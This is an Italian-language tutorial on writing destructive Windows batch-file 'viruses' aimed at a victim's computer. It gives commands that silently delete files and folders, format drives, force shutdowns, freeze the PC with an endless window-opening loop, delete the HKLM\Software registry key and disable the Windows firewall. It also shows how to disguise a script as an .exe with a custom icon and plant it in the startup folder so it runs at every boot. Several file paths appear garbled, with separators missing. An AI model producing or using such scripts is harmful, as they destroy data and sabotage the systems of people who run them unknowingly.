Virus .bat

Ciao Ragazzi oggi vi spiegherò come creare vari virus con il Prompt dei Comandi. ( file .bat)


Premetto che i file .bat sono dei file contenente codice maligno e non sono dei veri e propri virus ma io userò questo termine per comodità!






Come salvare un virus?
1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in “nome”.bat


Virus Per Cancellare Un File:


1) Aprite il blocco note
2) Incollateci il seguente codice:
@DEL /comando "C:percorsopercorso *.*"
3) Chiudete e salvate in .bat
IN DETTAGLIO: Che significa quel codice?
Allora:
1)@DEL = E il comando per cancellare i file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:
a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.
3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come:
eversor.*
4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come:
*.txt
5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo:
CODICE
@DEL /S /Q "C:ProgrammiDocuments and settings%­USERNAME%Desktopeversor.txt”


Virus Per Cancellare Una Cartella:


1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
@RD /s /q “C:Percorso_Cartella”
3) Salvare in .bat
IN DETTAGLIO: Perchè @RD?
@RD Serve in questo per cancellare una cartella, mentre @DEL era per File, @RD è per cartella.


Virus Per Formattare un unità:


1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
CODICE
format “unità”: /autotest /q /u
3) Salvare in .bat
IN DETTAGLIO: Questo virus formatta l’unità senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u).


N.B. Non è possibile formattare l’unità in uso e quindi l’unità C non potrà essere formattata!


Virus Per Disconnettere/Riavviare/Spegnere il PC:


1) Aprire il blocco note
2) Inserire dentro il seguente codice:
shutdown -comando
3) Salvare in .bat
IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:
a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte


Virus Per Far Impallare Il PC:


1) Aprire il blocco note
2) Inserire dentro il seguente codice:


:1
START
goto :1
3) Salvare in .bat
IN DETTAGLIO: Il comando START serve ad aprire nuove finestre MS-DOS. Il comando GOTO ridirige ad una riga di comando, in questo caso “:1” e quindi fa eseguire il comando start all’infinito!


Trasformare Il .bat In .exe
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del file


Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:
@REM parole a caso… ma tante!
4) Salvare in .bat
IN DETTAGLIO: Perchè @REM?
@REM serve per "Inserire Commenti", ma se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus.


Salvare il virus nell’esecuzione automatica in modo che parta ad ogni avvio del computer:
1) Aprire il blocco note
2) Aggiungere il seguente codice: echo “comando batch” > “C:Documents and settings%­USERNAME%­menu avvioprogrammiesecuzione automatica(nomevirus.bat)”


IN DETTAGLIO: Perché “>”?
Il segno maggiore (>) serve a salvare l’output di un comando batch in un altro file, in questo caso il nostro (nomefile.bat).
Il comando usato in questo caso è “echo” che serve a stampare a schermo una scritta.
Al posto di “comando batch” dovremo inserire il comando da utilizzare all’avvio del computer.
In questo modo il “comando batch” sarà la scritta di output del comando “echo” e verrà quindi salvato nel nostro (nomevirus.bat) nell’esecuzione automatica.
Ciò che segue il segno “>” è il percorso dove verrà salvato il file .bat e la variabile %­USERNAME% sostituisce il nome utente della vittima che noi non sappiamo.


Comandi per il registro di sistema:


REG EXPORT HKLMSoftware C:nomefile.txt


In questo modo viene esportata la stringa Hkey Local MachineSoftware nel file "C:nomefile.txt"


REG IMPORT "nomefile.reg"


In questo modo viene importato nel registro di sistema il fiole "nomefile.reg"


REG DELETE HKLMSoftware C:nomefile.txt


In questo modo eliminiamo la chiave Software e le sue sottochiavi!


X gli altri comandi basta scrivere REG /? nel prompt de Dos!




ALTRI COMANDI VARI:


Terminare un processo:
taskkill /f /im "nomeprocesso.exe"


Terminare un servizion:
net stop "nomeservizio"


X riavviare il sevizio:
net start "nomeservizio"


Disattivare firewall di windows:
Netsh firewall set opmode disable


Abilitare il firewall:
Netsh firewall set opmode enable